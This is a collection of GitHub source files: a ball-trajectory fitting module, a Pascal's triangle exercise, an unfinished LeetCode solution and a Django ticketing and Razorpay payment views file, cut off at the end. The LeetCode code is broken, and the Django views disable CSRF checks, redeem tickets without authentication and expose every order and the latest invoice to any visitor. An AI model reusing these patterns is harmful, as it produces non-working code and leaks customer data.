It is computed as in equation (7) of the paper\n \"\"\"\n window_size = 2*N+1\n\n seed_triplets = find_seed_triplets(candidates, n_candidates, k_seed, radius=seed_radius)\n\n if seed_triplets is None:\n return None, None, None, None, None\n\n parameters = np.zeros((len(seed_triplets), 2, 2)) # v, a\n info = np.zeros((len(seed_triplets), 10), dtype=np.int32)\n trajectories = np.zeros((len(seed_triplets), window_size, 2), dtype=np.float32) - 1\n supports = np.zeros((len(seed_triplets), window_size, 2), dtype=np.int32) -1\n costs = np.zeros(len(seed_triplets), dtype=np.float32) + np.finfo(np.float32).max\n\n for s, seed_triplet in enumerate(seed_triplets):\n k_min, k_mid, k_max = k_seed-1, k_seed, k_seed+1\n i_min, i_mid, i_max = seed_triplet\n i_seed = i_mid\n\n cost_old = np.inf # initialize old cost to infinity\n support_old = np.array([[0]], dtype=np.int32) # initialize old support to 0\n\n v, a = estimate_parameters(candidates[k_min, i_min], candidates[k_mid, i_mid], candidates[k_max, i_max], 1, 1)\n for i in range(N):\n trajectory = compute_trajectory(candidates[k_min, i_min], v, a, window_size, k_seed-k_min) # centered around k_seed, start computing from k_min\n\n support = find_support(trajectory, candidates, n_candidates, d_threshold, k_seed)\n cost = trajectory_cost(trajectory, candidates, n_candidates, d_threshold, k_seed)\n\n if k_max == -1 or len(support) <= len(support_old) or cost > cost_old:\n trajectories[s] = trajectory\n costs[s] = cost\n parameters[s,0] = v\n parameters[s,1] = a\n supports[s, :len(support)] = support\n for j, n in enumerate([k_seed, k_min, k_mid, k_max, i_seed, i_min, i_mid, i_max, len(support), i+1]):\n info[s, j] = n\n break\n\n support_old = support\n cost_old = cost\n\n k_min, k_mid, k_max, i_min, i_mid, i_max = find_next_triplet(support)\n v, a = estimate_parameters(candidates[k_min, i_min], candidates[k_mid, i_mid], candidates[k_max, i_max], k_mid-k_min, k_max-k_mid)\n\n costs = np.where(np.isnan(costs), np.inf, costs) # turn nan costs to infinity\n return parameters, info, trajectories, supports, costs\n\n\ndef fit_trajectory(candidates: np.ndarray, n_candidates: np.ndarray, k_seed: int, seed_radius: float, d_threshold: float, N: int):\n \"\"\"Fit a parabolic trajectory to a seed frame given position candidates.\n Seed triplets are found first, and then for each seed triplet a trajectory is iteratively fitted.\n The trajectory with the lowest cost is then chosen.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. 
Necessary for jit complation\n k_seed : int\n seed frame from which to start calculating the ball trajectories.\n It is the central frame of each seed triplet.\n seed_radius : float\n maximum distance between candidates of different frames\n to use them for a seed triplet\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n N : int : int\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1\n\n Returns\n -------\n parameters : np.ndarray of shape (2, 2)\n the parameters of the fitted parabolic trajectory.\n The order is: v, a\n info : dict\n Information about the support candidates.\n The values correspond respectively to:\n - `'k_seed'`: int, index of the seed frame\n - `'k_min'`: int, index of the first frame used to fit the trajectory\n - `'k_mid'`: int, index of the second frame used to fit the trajectory\n - `'k_max'`: int, index of the third frame used to fit the trajectory\n - `'i_seed'`: int, index of the candidate in the seed frame\n - `'i_min'`: int, index of the candidate in the first frame\n - `'i_mid'`: int, index of the candidate in the second frame\n - `'i_max'`: int, index of the candidate in the third frame\n - `'iterations'`: int, number of iterations before convergence\n - `'trajectory'` : np.ndarray of shape (2*N+1, 2), fitted trajectory along the whole window\n - `'supports'`: np.ndarray of shape (support_size, 2), frame indices in (:,0) and candidate indices in (:,1)\n - `'cost'` : float, cost of the trajectory. It is computed as in equation (7) of the paper\n \"\"\"\n parameters, info, trajectories, supports, costs = fit_trajectories_on_seed(candidates, n_candidates, k_seed, seed_radius, d_threshold, N)\n\n info_dict = {'found_trajectory': False,\n 'k_seed': k_seed,\n 'seed_radius': seed_radius,\n 'd_threshold': d_threshold,\n 'N': N}\n if costs is None:\n # no seed triplets are found and therefore no trajectories\n return info_dict\n\n # filter trajectories based on acceleration\n a = parameters[:,1]\n\n # keep only accelerations with a magnitude larger than 0.2 pixels/frame^2\n # this is useful to remove trajectories due to a stuck detection\n costs = np.where(np.linalg.norm(a, axis=1) >= 0.2, costs, np.inf)\n\n # keep only points in which the vertical acceleration points towards the ground\n # i.e the y component must be positive in the image reference frame\n costs = np.where(a[:,0] >= 0, costs, np.inf)\n\n # keep only points in which the acceleration horizontal component is smaller than 4x the vertical one\n # i.e. 
we don't expect a lateral effect of more than 2g\n costs = np.where(np.abs(a[:,1]) <= 2*np.abs(a[:,0]), costs, np.inf)\n\n if (costs==np.inf).all():\n # edge case: all found trajectories have been filtered out\n return info_dict\n\n s = np.argmin(costs)\n\n if info[s,8] == 0:\n # edge case: no trajectory found if the support set size is 0\n return info_dict\n\n info_dict['found_trajectory'] = True\n\n for i, k in enumerate(['k_seed','k_min','k_mid','k_max','i_seed','i_min','i_mid','i_max','n_support','iterations']):\n info_dict[k] = info[s,i]\n\n info_dict['v'] = parameters[s,0]\n info_dict['a'] = parameters[s,1]\n info_dict['trajectory'] = trajectories[s]\n info_dict['support'] = supports[s, :info[s,8]]\n info_dict['cost'] = costs[s]\n\n return info_dict\n\n\ndef fit_trajectories(candidates: np.ndarray, n_candidates: np.ndarray, starting_frame: int=0, seed_radius: float=40, d_threshold: float=10, N: int=10):\n \"\"\"Fit trajectories on the given position candidates.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. Necessary for jit complation\n starting_frame : int, optional\n index of the first frame in the video onto which the trajectory fitting is done, by default 0\n seed_radius : float, optional\n maximum distance between candidates of different frames\n to use them for a seed triplet. By default 40\n d_threshold : float, optional\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration. By default 10\n N : int : int, optional\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1. 
By default 10\n\n Returns\n -------\n fitting_info : dict\n it has 2 main entries, each of which has subentries:\n - `'parameters'` : dict\\\\\n this contains the parameters used for fitting (passed as input):\n - `'seed_radius'` : float\n - `'d_threshold'` : float\n - `'N'` : int\n - `'trajectories'` : list of dict\\\\\n each entry is a dictionary with the fitted trajectory for each frame:\n - `'found_trajectory'` : bool,\n - `'k_seed'` : int, index of the seed frame\n - `'k_min'` : int, index of the first frame used to fit the trajectory\n - `'k_mid'` : int, index of the second frame used to fit the trajectory\n - `'k_max'` : int, index of the third frame used to fit the trajectory\n - `'i_seed'` : int, index of the candidate in the seed frame\n - `'i_min'` : int, index of the candidate in the first frame\n - `'i_mid'` : int, index of the candidate in the second frame\n - `'i_max'` : int, index of the candidate in the third frame\n - `'n_support'` : int, number of support candidates\n - `'iterations'` : int, number of iterations before convergence\n - `'v'` : np.ndarray of shape `(2,)`, velocity at `k_min`\n - `'a'` : np.ndarray of shape `(2,)`, acceleration\n - `'trajectory'` : np.ndarray of shape `(2N+1, 2)`, estimated trajectory from `v` and `a`, centered on `k_seed`\n - `'support'` : np.ndarray of shape `(n_support, 2)`\n - `'cost'` : float, cost of the trajectory\n \"\"\"\n fitting_info = {'parameters': {'seed_radius': seed_radius, 'd_threshold': d_threshold, 'N': N}}\n fitting_info['trajectories'] = []\n\n print(\"Fitting trajectories:\")\n print(fitting_info['parameters'])\n for k in range(len(candidates)):\n print(f'{k+1} of {len(candidates)}', end='\\r')\n trajectory_dict = fit_trajectory(candidates, n_candidates, k, seed_radius, d_threshold, N)\n\n trajectory_dict['k_seed'] += starting_frame\n if trajectory_dict['found_trajectory']:\n for key in ['k_min', 'k_mid', 'k_max']:\n trajectory_dict[key] += starting_frame\n trajectory_dict['support'][:,0] += starting_frame\n\n for key in fitting_info['parameters'].keys():\n del trajectory_dict[key]\n\n fitting_info['trajectories'].append(trajectory_dict)\n\n print(f'{k+1} of {len(candidates)}')\n print('Done.')\n\n return fitting_info\n\n\ndef trajectories_to_json(info: dict, filename: str, indent=None):\n td = []\n for ti in info['trajectories']:\n d = {}\n for k, v in ti.items():\n if type(v) is np.ndarray:\n value = v.tolist()\n elif type(v) is np.int32:\n value = int(v)\n elif type(v) is np.float32:\n value = float(v)\n else:\n value = v\n d[k] = value\n td.append(d)\n\n d = {'parameters': info['parameters']}\n d['trajectories'] = td\n\n with open(filename, 'w') as f:\n json.dump(d, f, indent=indent)\n\n\n@jit\ndef fit_trajectories_on_seed_2(candidates: np.ndarray, n_candidates: np.ndarray, k_seed: int, seed_radius: float, d_threshold: float, N: int):\n \"\"\"Fit trajectories to position candidates for a seed frame.\n Seed triplets are found first, and then for each seed triplet a trajectory is iteratively fitted.\n Same exact algorithm as fit_trajectories, but with a clearer workflow for a clearer explanation.\n It takes an approx. 10% performance hit.\n\n Parameters\n ----------\n candidates : np.ndarray, shape (:, max_candidates, 2)\n positions of the detection candidates.\n The first dimension refers to the frames,\n the second dimension to the candidate in each frame\n and the third one to the x and y components: the first element is y, the second one x.\n n_candidates : 1D np.ndarray\n number of candidates in each frame. 
Necessary for jit complation\n k_seed : int\n seed frame from which to start calculating the ball trajectories.\n It is the central frame of each seed triplet.\n radius : int\n maximum distance between candidates of different frames\n to use them for a seed triplet, by default 100\n d_threshold : float\n maximum distance between the true position of the candidates and the estimated position\n in the previous iteration\n N : int\n number of frames before and after to use for the trajectory fitting.\n The window size will therefore be 2*N+1\n\n Returns\n -------\n parameters : np.ndarray of shape (num_seed_triplets, 2, 2)\n the parameters of the fitted parabolic trajectories for each seed triplet.\n In the second dimension the order is: v, a\n info : np.ndarray of shape (num_seed_triplets, 10)\n Information about the candidates in the support for each seed triplet.\n The values in the second component correspond respectively to:\n - `'k_seed'`: index of the seed frame\n - `'k_min'`: index of the first frame used to fit the trajectory\n - `'k_mid'`: index of the second frame used to fit the trajectory\n - `'k_max'`: index of the third frame used to fit the trajectory\n - `'i_seed'`: index of the candidate in the seed frame\n - `'i_min'`: index of the candidate in the first frame\n - `'i_mid'`: index of the candidate in the second frame\n - `'i_max'`: index of the candidate in the third frame\n - `'n_support'`: number of support candidates\n - `'iterations'`: number of iterations before convergence\n\n trajectories : np.ndarray of shape (num_seed_triplets, 2*N+1, 2)\n fitted trajectories along the whole window\n supports: np.ndarray of shape (num_seed_triplets, support_size, 2)\n frame indices in (:,:,0) and candidate indices in (:,:,1)\n costs : np.ndarray of shape (num_seed_triplets)\n costs of each trajectory. 
It is computed as in equation (7) of the paper\n    \"\"\"\n    window_size = 2*N+1\n\n    seed_triplets = find_seed_triplets(candidates, n_candidates, k_seed, radius=seed_radius)\n\n    if seed_triplets is None:\n        return None, None, None, None, None\n\n    parameters = np.zeros((len(seed_triplets), 2, 2)) # v, a\n    info = np.zeros((len(seed_triplets), 10), dtype=np.int32)\n    trajectories = np.zeros((len(seed_triplets), window_size, 2), dtype=np.float32) - 1\n    supports = np.zeros((len(seed_triplets), window_size, 2), dtype=np.int32) -1\n    costs = np.zeros(len(seed_triplets), dtype=np.float32) + np.finfo(np.float32).max\n\n    for s, seed_triplet in enumerate(seed_triplets):\n        k_min, k_mid, k_max = k_seed-1, k_seed, k_seed+1\n        i_min, i_mid, i_max = seed_triplet\n        i_seed = i_mid\n\n        v, a = estimate_parameters(candidates[k_min, i_min], candidates[k_mid, i_mid], candidates[k_max, i_max], 1, 1)\n        trajectory = compute_trajectory(candidates[k_min, i_min], v, a, window_size, k_seed-k_min) # centered around k_seed, start computing from k_min\n\n        support = find_support(trajectory, candidates, n_candidates, d_threshold, k_seed)\n        cost = trajectory_cost(trajectory, candidates, n_candidates, d_threshold, k_seed)\n\n        for i in range(N):\n            k_min_next, k_mid_next, k_max_next, i_min_next, i_mid_next, i_max_next = find_next_triplet(support)\n\n            v_next, a_next = estimate_parameters(candidates[k_min_next, i_min_next], candidates[k_mid_next, i_mid_next], candidates[k_max_next, i_max_next], k_mid_next-k_min_next, k_max_next-k_mid_next)\n            trajectory_next = compute_trajectory(candidates[k_min_next, i_min_next], v_next, a_next, window_size, k_seed-k_min_next) # centered around k_seed, start computing from k_min\n\n            support_next = find_support(trajectory_next, candidates, n_candidates, d_threshold, k_seed)\n            cost_next = trajectory_cost(trajectory_next, candidates, n_candidates, d_threshold, k_seed)\n\n            if k_max_next == -1 or (k_min==k_min_next and k_max==k_max_next) or cost_next > cost:\n                trajectories[s] = trajectory\n                costs[s] = cost\n                parameters[s,0] = v\n                parameters[s,1] = a\n                supports[s, :len(support)] = support\n                for j, measurement in enumerate([k_seed, k_min, k_mid, k_max, i_seed, i_min, i_mid, i_max, len(support), i+1]):\n                    info[s, j] = measurement\n                break\n\n            v, a = v_next, a_next\n            trajectory = trajectory_next\n            support = support_next\n            cost = cost_next\n            k_min, k_mid, k_max, i_min, i_mid, i_max = k_min_next, k_mid_next, k_max_next, i_min_next, i_mid_next, i_max_next\n\n\n    costs = np.where(np.isnan(costs), np.inf, costs) # turn nan costs to infinity\n    return parameters, info, trajectories, supports, costs\n","repo_name":"michele98/ball_tracking_padel","sub_path":"trajectories/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":26954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"70363042775","text":"#!/usr/bin/python3\n\"\"\"\nModule 14-pascal_triangle\nContains function that returns int lists of pascal triangle of any given size\n\"\"\"\n\n\ndef pascal_triangle(n):\n    \"\"\"\n    Return:\n        empty list [] if n <= 0\n        if n is 7, we should expect:\n        [1]\n        [1, 1]\n        [1, 2, 1]\n        [1, 3, 3, 1]\n        [1, 4, 6, 4, 1]\n        [1, 5, 10, 10, 5, 1]\n        [1, 6, 15, 20, 15, 6, 1]\n    \"\"\"\n    if n <= 0:\n        return []\n    if n == 1:\n        return [[1]]\n\n    triangle = [[1]]\n    for rows in range(n-1):\n        triangle.append([a+b for a, b\n                        in zip([0] + triangle[-1], triangle[-1] + [0])])\n    return 
triangle\n","repo_name":"jubrealguy/alx-higher_level_programming","sub_path":"0x0B-python-input_output/12-pascal_triangle.py","file_name":"12-pascal_triangle.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"29172575565","text":"\nfrom scipy.special import comb, perm\n\nclass Solution:\n def getProbability(self, balls):\n K = len(balls)\n N = sum(balls)\n dps = [[[-1] * (N // 2) for j in range(K)] for i in range(N//2+1)]\n \n def func(n, k, t):\n if k >= K:\n return 1 if t == 0 and n == 0 else 0\n if dps[n][k][t] > -1:\n return dps[n][k][t]\n if k < t:\n dps[n][k][t] = 0\n return dps[n][k][t]\n prob = 0\n for c in range(min(grid[k], n, t)+1):\n prob += comb(grid[k], c) / 2 ** grid[k] * func(n-c, k+1, t-(c>=0), nt-c)\n \n func(N//2, 0, )","repo_name":"Guardian44x/Algorithm-Problems","sub_path":"LeetCode/5427.py","file_name":"5427.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36404094560","text":"import mimetypes\nfrom django.views import generic\nfrom django.shortcuts import redirect, render\nfrom .models import *\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nimport razorpay\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponseBadRequest\nfrom localStoragePy import localStoragePy\nimport json\nfrom django.core.mail import send_mail, EmailMessage\nfrom static.pypdf import test\nimport os\nimport random\nimport string\nfrom django.utils import timezone\nfrom .systemconfig import *\nfrom qrcode import *\nfrom .qrcoded import *\nimport smtplib\nfrom urllib.parse import urlparse,parse_qs \nfrom .fusioncharts import FusionCharts\nfrom wsgiref.util import FileWrapper\nimport time\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\n\n\nrazorpay_client = razorpay.Client(\n auth=(get_razor_key_id(), get_razor_key_secret()))\n\n\n@csrf_exempt\ndef event_detail(request):\n if request.method == 'POST':\n event_id = request.POST.get('event_id')\n event = Event.objects.get(event_id=event_id)\n date_diff = event.Event_to - event.Event_from\n response_data = {\n 'event_id': event.event_id,\n 'event_name': event.name,\n 'event_from': event.Event_from.strftime(\"%Y-%m-%d\"),\n 'event_to': event.Event_to.strftime(\"%Y-%m-%d\"),\n 'date_diff': date_diff.days\n }\n return JsonResponse(response_data)\n else:\n return JsonResponse({'error': 'Invalid request method'})\n\ndef TicketsView(request):\n return render(request, 'frontend/tickets.html')\n\n\n@csrf_exempt\ndef PaymentView(request):\n start = time.time()\n\n def verify_signature(response_data):\n client = razorpay.Client(\n auth=(get_razor_key_id(), get_razor_key_secret()))\n return client.utility.verify_payment_signature(response_data)\n\n if \"razorpay_signature\" in request.POST:\n payment_id = request.POST.get(\"razorpay_payment_id\", \"\")\n provider_order_id = request.POST.get(\"razorpay_order_id\", \"\")\n signature_id = request.POST.get(\"razorpay_signature\", \"\")\n order = Order.objects.get(provider_order_id=provider_order_id)\n order.payment_id = payment_id\n order.signature_id = signature_id\n order.save()\n if order.ticket_type == 'BASE':\n ticket = Tickets.objects.filter(event_id=order.event_id).order_by('ticket_type')[0]\n event_ticket_remaining = 
Tickets.objects.filter(event_id=order.event_id).values('ticket_count').order_by(\"ticket_type\")[0]['ticket_count']\n ticket.ticket_count = event_ticket_remaining - order.ticket_count\n elif order.ticket_type == 'VIP':\n ticket = Tickets.objects.filter(event_id=order.event_id).order_by('ticket_type')[1]\n event_ticket_remaining = Tickets.objects.filter(event_id=order.event_id).values('ticket_count').order_by(\"ticket_type\")[1]['ticket_count']\n ticket.ticket_count = event_ticket_remaining - order.ticket_count\n\n ticket.save()\n # tickets.ticket_count = event_ticket_remaining[0]['ticket_count'] - 1\n print(order)\n if verify_signature({\n \"razorpay_payment_id\": payment_id,\n \"razorpay_order_id\": provider_order_id,\n \"razorpay_signature\": signature_id,\n }):\n order.status = PaymentStatus.SUCCESS\n event_location = EventLocation.objects.get(location_id=order.event_id)\n event = Event.objects.get(event_id=order.event_id)\n\n start_date = event.Event_from\n end_date = event.Event_to\n\n event.remain_tickets = event.remain_tickets - order.ticket_count\n print(\"............\",event.total_count,order.ticket_count)\n event.save()\n order.location_link = event_location.location_link\n order.save()\n temp_hash= generate_hash(order)\n temp_generate_url = generate_url(temp_hash)\n invoive_qrcode(temp_generate_url,order)\n order.save_hash = temp_hash\n order.save_url = temp_generate_url\n order.save()\n print(order)\n cvt_start = time.time()\n test.convert_to_pdf(order,get_host_companyName(request),event_location,event)\n cvt_end = time.time()\n print(\"converter\",cvt_end-cvt_start)\n\n mail_start = time.time()\n Mail_send(order,str(get_host_email()),order.email,str(get_host_password()))\n mail_end = time.time()\n print(\"mail\",mail_end-mail_start)\n end = time.time()\n print(\"full function\",end - start)\n return render(request, \"frontend/sucess.html\", context={\"status\": order.status})\n \n \n else:\n order.status = PaymentStatus.FAILURE\n order.save()\n return render(request, \"frontend/fauiler.html\", context={\"status\": order.status})\n else:\n if request.POST.get(\"error[metadata]\"):\n payment_id = json.loads(request.POST.get(\n \"error[metadata]\")).get(\"payment_id\")\n provider_order_id = json.loads(request.POST.get(\"error[metadata]\")).get(\n \"order_id\"\n )\n order = Order.objects.get(provider_order_id=provider_order_id)\n order.payment_id = payment_id\n order.status = PaymentStatus.FAILURE\n order.save()\n return render(request, \"frontend/payment.html\", context={\"status\": order.status})\n else:\n return render(request, \"frontend/sucess.html\")\n\n # if request.method == \"POST\":\n # try:\n\n # # get the required parameters from post request.\n # payment_id = request.POST.get('razorpay_payment_id', '')\n # razorpay_order_id = request.POST.get('razorpay_order_id', '')\n # signature = request.POST.get('razorpay_signature', '')\n # params_dict = {\n # 'razorpay_order_id': razorpay_order_id,\n # 'razorpay_payment_id': payment_id,\n # 'razorpay_signature': signature\n # }\n\n # # verify the payment signature.\n # result = razorpay_client.utility.verify_payment_signature(\n # params_dict)\n # print(\",,,,,,,,,,,,,,,\",result)\n # if result is not None:\n # amount = 2000 # Rs. 
200\n # try:\n # # capture the payemt\n # razorpay_client.payment.capture(payment_id, amount)\n\n # # render success page on successful caputre of payment\n # return render(request, 'paymentsuccess.html')\n # except:\n\n # # if there is an error while capturing payment.\n # return render(request, 'paymentfail.html')\n # else:\n\n # # if signature verification fails.\n # return render(request, 'paymentfail.html')\n # except:\n\n # # if we don't find the required parameters in POST data\n # return HttpResponseBadRequest()\n # else:\n # # if other than POST request is made.\n # return HttpResponseBadRequest()\n\n\ndef IndexView(request):\n event_location = EventLocation.objects.all()\n current_date = timezone.now().date()\n event_item = Event.objects.filter(Event_to__gt=current_date, is_deleted=False)\n event_item = Event.objects.all()\n \n context = {\n 'event_location': event_location,\n 'event_item': event_item,\n 'today': current_date,\n\n }\n return render(request, 'frontend/index.html', context)\n\n\ndef popup_data(request, id):\n event_location = EventLocation.objects.all()\n event_item = Event.objects.all()\n tickets_item = Tickets.objects.filter(event_id=id)\n context = {\n 'event_location': list(event_location.values()),\n 'event_item': list(event_item.values()),\n 'tickets_item': list(tickets_item.values().order_by('ticket_type')),\n }\n return JsonResponse(context)\n\n\nclass EmployeeView(generic.ListView):\n template_name = 'employee/employee.html'\n\n def get_queryset(self):\n return None\n\n\nclass CatagoryView(generic.ListView):\n template_name = 'event_catagory/catagory.html'\n\n def get_queryset(self):\n return None\n\n\nclass EventView(generic.ListView):\n template_name = 'event/event.html'\n\n def get_queryset(self):\n return None\n\n\nclass Eventlocation(generic.ListView):\n template_name = 'event_location/event_location.html'\n\n def get_queryset(self):\n return None\n\n\nclass Eventransaction(generic.ListView):\n template_name = 'transactions/transactions.html'\n\n def get_queryset(self):\n return None\n\n\nclass ClientView(generic.ListView):\n template_name = 'client/client.html'\n\n def get_queryset(self):\n return None\n\n\nclass EmployeeDashboardView(generic.ListView):\n template_name = 'employee/employee_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass ClientDashboardView(generic.ListView):\n template_name = 'client/client_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass TransactionsDashboardView(generic.ListView):\n template_name = 'transactions/transactions_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass EventDashboardView(generic.ListView):\n template_name = 'event/event_dashboard.html'\n\n def get_queryset(self):\n return None\n\n\nclass EventCatagoryView(generic.ListView):\n template_name = 'event_catagory/catagory_dashboard.html'\n\n def get_queryset(self):\n return None\n\n@csrf_exempt\ndef Razorpay(request):\n \n event_dates = request.POST.get('event_dates')\n event_name = request.POST.get('event_name')\n ticket_count = request.POST.get('ticket_count')\n ticket_type = request.POST.get('ticket_type')\n payment_event_id = request.POST.get('event_id')\n amount = int(request.POST.get('total'))\n total_amount = (amount * 0.18) + amount\n user_email = request.POST.get('email')\n user_phone = request.POST.get('phone')\n user_name = request.POST.get('user_name')\n event_id = request.POST.get('event_id')\n event_From = event_dates\n # event_From = Event.objects.get(event_id=payment_event_id)\n # event_From 
= event_From.Event_from.strftime('%Y-%m-%d %H:%M:%S')\n\n order_currency = 'INR'\n razorpay_order = razorpay_client.order.create(dict(amount=amount*100,\n currency=order_currency,\n payment_capture='0'))\n\n order = Order.objects.create(\n\n \n user_name=user_name,\n event_id=event_id,\n event_name=event_name,\n ticket_count=ticket_count,\n ticket_type=ticket_type,\n event_From=event_From,\n amount=total_amount,\n provider_order_id=razorpay_order['id'],\n email=user_email,\n user_phone=user_phone,\n payment_event_id=payment_event_id\n )\n order.save()\n razorpay_order_id = razorpay_order['id']\n callback_url = \"/razorpay/payment/\"\n context = {}\n context['razorpay_order_id'] = razorpay_order_id\n context['razorpay_merchant_key'] = get_razor_key_id()\n context['razorpay_amount'] = amount\n context['currency'] = order_currency\n context['callback_url'] = callback_url\n # context['order'] = order\n\n return JsonResponse(context)\n\n\ndef freepay(request):\n event_name = request.POST.get('event_name')\n ticket_count = request.POST.get('ticket_count')\n ticket_type = request.POST.get('ticket_type')\n user_name = request.POST.get('user_name')\n event_id = request.POST.get('event_id')\n payment_event_id = request.POST.get('event_id')\n user_email = request.POST.get('email')\n user_phone = request.POST.get('phone')\n event_From = Event.objects.get(event_id=payment_event_id)\n event_From = event_From.Event_from.strftime('%Y-%m-%d %H:%M:%S')\n # random generate 16 character ticket\n ticket = ''.join(random.choices(\n string.ascii_uppercase + string.ascii_lowercase, k=16))\n \n order = Order.objects.create(\n\n \n user_name=user_name,\n event_id=event_id,\n event_name=event_name,\n ticket_count=ticket_count,\n ticket_type='Base',\n event_From=event_From,\n amount=0,\n provider_order_id=ticket,\n email=user_email,\n user_phone=user_phone,\n payment_event_id=payment_event_id,\n status='success',\n payment_id=ticket\n\n\n )\n event_location = EventLocation.objects.get(location_id=order.event_id)\n order.location_link = event_location.location_link\n temp_hash= generate_hash(order)\n temp_generate_url = generate_url(temp_hash)\n invoive_qrcode(temp_generate_url,order)\n order.save_hash = temp_hash\n order.save_url = temp_generate_url\n order.save()\n \n event = Event.objects.get(event_id=order.event_id)\n test.convert_to_pdf(order,get_host_companyName(request),event_location,event)\n Mail_send(order,str(get_host_email()),order.email,str(get_host_password()))\n \n# subject = 'Event Management Payment'\n# message = f'''Hi {order.user_name}, thank you for registering in Event.\n\n# your order is successfully placed.\n \n# order id: {order.provider_order_id} \n# order amount: {int(order.amount)}/- rupees only\n# order status: {order.status}\n# Phone number: {order.user_phone}\n \n \n \n# '''\n# email_from = get_host_email()\n# recipient_list = [order.email]\n# email = EmailMessage(subject, message, email_from, recipient_list)\n# fd = open(\"invoice.pdf\", 'rb')\n# email.attach(\"invoice.pdf\", fd.read(), 'application/pdf')\n# email.send()\n\n return JsonResponse({'status': 'success'})\n\n\ndef success(request):\n return render(request, 'frontend/sucess.html')\n\n@csrf_exempt\ndef customer_view(request):\n \n url = request.build_absolute_uri()\n\n query_params = urlparse(url).query\n params_dict = dict(parse_qs(query_params))\n\n data = params_dict.get('data')\n\n\n if request.method == \"POST\":\n data = json.loads(request.POST.get('data')) \n print(\",,,,,,,,,,,,,,,,,,,,,,\",data)\n try:\n ticket = 
Order.objects.get(payment_id=data['id'])\n print(ticket)\n\n if ticket:\n ticket.ticket_used = 'Yes'\n ticket.save()\n return HttpResponse(\"True\")\n except:\n return HttpResponse(\"Error\")\n\n\n if data:\n \n try:\n print(\"try\",data[0])\n ticket = Order.objects.get(save_hash=data[0])\n if ticket:\n context = {\n \"ticket_sale\": ticket,\n }\n return render(request,'frontend/ticket_view.html',context)\n except: \n return render(request,'frontend/ticket_fail_view.html')\n return HttpResponse(str(request.build_absolute_uri()))\n\n# The `chart` function is defined to generate Column 2D chart from database.\ndef analysis_view(request):\n # Chart data is passed to the `dataSource` parameter, as dict, in the form of key-value pairs.\n dataSource = {}\n dataSource['chart'] = {\n \"caption\": \"Total Sales of each Event\",\n \"subCaption\": \"\",\n \"xAxisName\": \"Events\",\n \"yAxisName\": \"Ticket remaining\",\n \"numberPrefix\": \"Ps. \",\n \"theme\": \"fusion\"\n\n \n }\n\n # The data for the chart should be in an array where each element of the array is a JSON object\n # having the `label` and `value` as key value pair.\n\n dataSource['data'] = []\n # Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.\n for key in Event.objects.all():\n if key.is_deleted == False:\n data = {}\n data['label'] = key.name\n data['value'] = key.total_count-key.remain_tickets\n dataSource['data'].append(data)\n\n # Create an object for the Column 2D chart using the FusionCharts class constructor\n column2D = FusionCharts(\"column2D\", \"ex1\" , \"600\", \"350\", \"chart-1\", \"json\", dataSource)\n return render(request, 'frontend/analysis.html', {'output': column2D.render()})\n\ndef sysconfigs():\n return redirect('/admin/event_management_application/systemconfigs/1/change/')\n\ndef redeemed(request):\n return render(request,'frontend/redeemed.html')\n\n@csrf_exempt\ndef contact_us(request):\n print(request.POST.get('contact_subject'))\n email = request.POST.get('contact_email')\n name = request.POST.get('contact_name')\n phone= request.POST.get('contact_phone')\n subject = request.POST.get('contact_subject') + email\n message = \" Email from \"+ email + \" Name: \"+ name + \" Phone: \"+ phone\n send_mail(subject, message, email, [get_host_email()], fail_silently=False)\n return JsonResponse({'status': 'success'})\n\n\n\n# Define function to download pdf file using template\ndef download_pdf_file(request):\n paymentid = Order.objects.last().payment_id\n filename = f'{paymentid}.pdf'\n BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n filepath = BASE_DIR + '/static/invoices/' + filename\n path = open(filepath, 'rb')\n mime_type, _ = mimetypes.guess_type(filepath)\n response = HttpResponse(path, content_type=mime_type)\n response['Content-Disposition'] = \"attachment; filename=%s\" % filename\n return response\n\n\n@csrf_exempt\ndef recent_transactions(request):\n \n\n email = request.POST.get('email')\n events = Order.objects.all().order_by('-created_on')\n items_per_page = 10\n paginator = Paginator(events, items_per_page)\n page_number = request.GET.get('page')\n try:\n page_obj = paginator.get_page(page_number)\n except PageNotAnInteger:\n page_obj = paginator.get_page(1)\n except EmptyPage:\n page_obj = paginator.get_page(paginator.num_pages)\n context = {\n 'events': events,\n 'email': email,\n 'page_obj': page_obj,\n }\n\n return render(request, 'frontend/recent_transactions.html', context)\n\n\n@csrf_exempt\ndef choices(request):\n if 
